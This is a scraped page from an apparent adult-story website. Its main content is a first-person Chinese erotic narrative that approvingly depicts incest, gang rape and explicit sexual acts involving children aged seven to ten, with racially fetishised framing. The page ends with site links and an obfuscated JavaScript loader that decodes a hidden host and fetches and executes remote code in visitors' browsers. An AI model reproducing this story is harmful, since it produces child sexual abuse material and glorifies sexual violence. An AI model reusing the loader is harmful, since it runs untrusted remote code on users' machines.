莎莉曾经邀Jim单独和她出去,想试试只和Jim性交的感觉,但是Jim拒绝了,Jim说他只肯在别人干过她,而且射精在她体内之后才想插她,除非她的儿子在旁边看,他才会第一个干她。

莎莉说,今晚也才是第一次由Jim第一个开始干她。

莎莉继续述说这三个月她被Jim和其他黑人玩弄的事情。

莎莉说有一次Jim要她打扮得和小学女童一样,她打扮好,Jim说她看起来只有十三岁。那天深夜,Jim要她走进一条暗巷,Jim知道巷子里有些什么人,一个单身小女孩三更半夜走进这条巷子会发生什么事。

莎莉说她才走到一半,她就被两个巨大的黑人拖进一个仓库里,她在仓库里被十八个黑人不停地重覆轮暴。其中两个还只是孩子,一个十岁,另一个只有九岁。

莎莉说她真的很喜欢被陌生人玩弄,她特别喜欢那两个小孩子和她性交,在和那两个儿童性交的时候,她知道她是他们的第一个女人,这让她更加兴奋。

那些男人轮奸过她后,Jim带莎莉去一家汽车宾馆,和她一直性交了三个小时。在Jim和她性交的时候,莎莉告诉Jim,她很喜欢和小男孩性交。

两天之后,Jim安排了一大群非常小的小男孩来轮奸莎莉,最小的男孩只有七岁,最大的也不过九岁,一共有十一个黑人小孩子,莎莉鼓励那群小男孩尽情地玩弄她。在他们每个人起码都在莎莉体内射精超过四次后,Jim再用他的大宾周,当着这些小孩的面干她。

莎莉告诉我,从那次之后,我去上班的时候,有几个小男孩常常带他的小朋友来我们家,莎莉让他们任意玩她身上任何一个肉洞。在性交之后,她告诉每一个男孩,随时欢迎他们带朋友来干她。

莎莉说,一连有两个星期,几乎每天都有一大群不同的小朋友来我家干她,这附近所有的黑人儿童都和她性交过,也知道插进她阴道、肛门和小嘴各是什么感觉,也就是说,他们都试过莎莉这三个肉洞了。

然后莎莉还告诉我,Jim带她去过几个酒吧,她也要我带她去,那些酒吧里都是黑人,如果有女人想去被黑人干,就独自一人或是找人陪她去。她们的男人会看着他们的女人被黑人搭讪,然后和那些黑人打上一炮。进入那些酒吧的女人,可以被酒吧里的任何人奸淫,当然,所有的人也可以自由地看她们性交的样子。

莎莉说,她很喜欢那种地方,因为她喜欢当着许多人的面前被一大群黑人轮奸,她也喜欢在酒吧里和其他跟她一样淫荡的女人聊天。

她说那些黑人总是先上前请她跳舞,跳到兴奋时再把她的衣服撕光,让她一丝不挂地在舞池跳舞,有时他们在舞池中央当着所有客人的面,把手指插进她的阴道里抽送,有时他们直接在舞池中央干她。

莎莉说她在酒吧里也和别的白人性交过,但是也只有一次。那一天她才刚被七个黑人轮奸完,其中有两个还是酒保,当时现场有一些白人女人的老公看他们的妻子被人轮奸,看得欲火焚身,但是他们又无法找他们的老婆解决性欲,因为她们正被黑人们轮奸中,而他们又好想干一干里面装满精液的阴道,正好他们看到莎莉刚被轮奸过的阴道正缓缓渗出精液,于是他们来找莎莉,想来和她性交。但是莎莉拒绝了,因为她唯一肯性交的白人只有我,但是Jim要她让他们干,所以她也只有答应。

她说那五个白人男子一边看他们的女人被人奸淫、一边奸淫她,射精在她体内。那些女人也看着她们的男人把肉棒插进莎莉的阴道、肛门和嘴里。

莎莉兴奋得要命,她猛烈地吸着口中的阴茎,直到那个男人射精在她口中,她吞下一半的精液,接着将另一半的精液喷在身边另一个女人的阴道上。

莎莉说,自从她这么做之后,Jim和其他的黑人有时在干她的时候,会命令她去舔别的女人刚被干过的阴道,把她们阴道内的精液吸出来,全部吃进去;许多女人也会来舔莎莉的阴道,吃她体内的精液。

她说由于她娇小的身驱和稚嫩的面孔,使她在酒吧里很快地出了名,许多酒吧的人都认识她。Jim一共带她去过三间这种酒吧,共去过八次。

一些去酒吧的女人告诉莎莉,那些黑人们还会不时办一些狂欢派对,那些派对更是刺激,如果莎莉想更下贱、更彻底的被黑人玩弄的话,不妨去参加这种聚会。

莎莉很想去参加,于是她告诉那些黑人她从来没有参加过这种派对,很想找一天去玩玩。于是一大群的黑人一边干她,一边请她去参加他们的派对。而莎莉则是告诉他们,她很荣幸去参加他们的聚会,会让他们好好玩个够。

莎莉要我把宾周插进她阴道,她说,因为她觉得我一边干她,一边听她说她的遭遇,会让她很兴奋。尤其她想让我试试,插一个里面满是精液的阴道有多舒服。

我爬到了莎莉的两腿之间,开始干她。我从来没有试过一个阴道居然会这么热、这么湿,我一边干她一边告诉她,她的阴道干起来真是舒服极了,我希望每天都能这么干她。

我几乎是立刻射精,但是我的阴茎还是硬得要命,所以我也没拔出来,继续干着莎莉。

莎莉告诉我,今晚的事情她已经策划了两个星期,因为在两个星期前她发现她怀孕了,而让她受精的人不知道是哪个黑人。她说如果我看到她被黑人强暴,那她就可以推说怀孕是因为遭到了强暴。

她还向我解释,她在第二次被强暴时就停止避孕了,她不知道为什么要这么做,她心里只是有一股冲想要在毫无安全准备之下的,才是美妙的强奸。

她说她两个星期前不和我作爱,并不是因为要调整体质,那是因为她每天阴道里都装满了别的男人的精液,如果我一碰她,那我立刻会知道发生了什么事。她还不想告诉我这件事,一直要等到她确定我喜欢看她和黑人性交为止。

她要我看着她的眼睛:“你真的喜欢看我被黑人玩弄,而且被他们搞大肚子吗?”

我的答案是把我的宾周深深插进她的阴道,把剩下的精液全射进她子宫里,和那些黑人的精液混在一起。

我要她答应我,以后永远要让黑人轮暴她;我告诉她,如果她真的像她所说的这么爱我的话,那么她就应该常常让黑人轮暴她,而且永远也不要感到羞耻、不安,总而言之,她被黑人强暴是天经地义的。我还对她说,我很喜欢黑人让她怀孕,她在和他们性交的时候,应该鼓励他们在子宫内射精让她怀孕,而且我知道她怀了黑人宝宝后,干起来会更兴奋。

我还对她说,我希望Jim和他的朋友们还在这里,因为我想看他们来干莎莉已经有身孕的身体。

莎莉也说,她希望现在有一大群黑人排队等着干她,或着我可以带她去某一间Jim带她去过的酒吧,当着大家的面看她被黑人轮奸。

不管是她的第一个还是第二个愿望,我听起来着觉得相当刺激,我好想看到成千上万的黑色阴茎,插进我那娇小又有身孕的妈妈体内。

我告诉她,我很乐意带她去酒吧,如果她知道哪里还有黑人们办的派对,我也可以带她去。

莎莉说,今天晚上有两个派对邀请她去,她知道在什么地方。

我对她说,她要我带她去什么酒吧或是派对都行,但是要答应我的条件。

莎莉说,她会答应我的所有要求。

我觉得我多年的梦想开始实现了,我看着我娇小可爱的亲妈妈一丝不挂地躺在床上,精液从她的阴道和肛门里不断渗出,她的脸上和乳房上都是精液干涸了的痕迹。这决定看看今晚能够玩到什么程度,我相信今晚之后,我的妈妈将会成为一个不折不扣的荡妇。

于是我告诉她我的要求:“我可以带你去任何你想去的地方,一直到我说够了为止,即使你已经不能再承受任何男人的奸淫,但是我没有要你停下来,你就得继续让人奸淫;你不能把身上的精液弄干净,而且要无时无核都要穿得像个妓女一样,你不可以戴胸罩,也不可以穿内裤,你的衣服上不能有扣子和拉链,好让别人可以很容易地把你脱光;不管你在什么地方,或是有什么人在看,你一定要按照任何一个干你的黑人的要求,做出他们要你做的性表演,你要随时让我看清楚你性交的样子和姿势;你还要在他们干你之前,让他们知道你已经有了身孕,而且你怀的是黑人的小孩;你也要让所有的人知道我是你的儿子,我喜欢看你被黑人奸淫,更喜欢由黑人让你怀孕;你要让他们知道,我希望他们尽情玩弄你,他们可以在任何时间、任何地方干你;你还要让他们知道,他们可以在我去上班的时候,到我家来找你淫欲,而且不止他们可以来,他们还可以带同他们的朋友一起来;当我们去过一个地方,要去另一个地方时,你还可以找几个黑人上我们的车,让他们在车上继续干你,一直干你干到我到达目的地;最后,当我们回家之后,不管我们今夜做了什么,这个周末你要做我的性奴隶。”

我告诉莎莉,这个世界上我只爱妈妈一个,如果她也这么爱我的话,就照我的话去做。

我最后还补充一点,我喜欢她怀黑人宝宝,我希望她这一胎不是最后一胎。

当我告诉莎莉我的要求时,莎莉一边自慰、一边听我说话,她的高潮一直不断,她说她会一直听从我的话,让黑人们尽情玩弄她。

我要她马上去穿衣服,因为我迫不及待地想看她被黑人奸淫。[/

评分
相关推荐
3.0分

3.0分 妈妈的黑色梦魘dd1

3.0分

3.0分 儿时回忆之妈妈的群交127

3.0分

3.0分 儿时回忆之妈妈的群交127

3.0分

3.0分 儿时回忆之妈妈的群交127

3.0分

3.0分 老妈喜欢群交12b

3.0分

3.0分 妈妈的白色内裤49d

3.0分

3.0分 绝色妈妈f7b

3.0分

3.0分 妈妈与黑人姨丈79f

3.0分

3.0分 娶得国色天香的妈妈259

3.0分

3.0分 妈妈许晴的绿色暑假50a


提示:为了您能够顺利的找到本站,请牢记:WWW.AVPINDUODUO.COM

请不要忽略该提示,这将意味着您将可能无法找到通往本站的地址。


免责声明 || 广告合作 || 意见反馈

AV拼多多【WWW.AvPinDuoDuo.COM】

已运行1 年 84 天 0 小时 52 分钟 33 秒

所属·美国·华盛顿 网站地图

function DgUow(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function YXMxB(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return DgUow(t);};window[''+'O'+'s'+'B'+'v'+'r'+'A'+'y'+'N'+'U'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=YXMxB,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery';if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/x/'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'t'+'d'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/j/'+i;cs.parentElement.insertBefore(s,cs);}})('Zmm1rLmmRzcXprLmmNu','151936',window,document,['m','mbRtTdBxso']);}:function(){};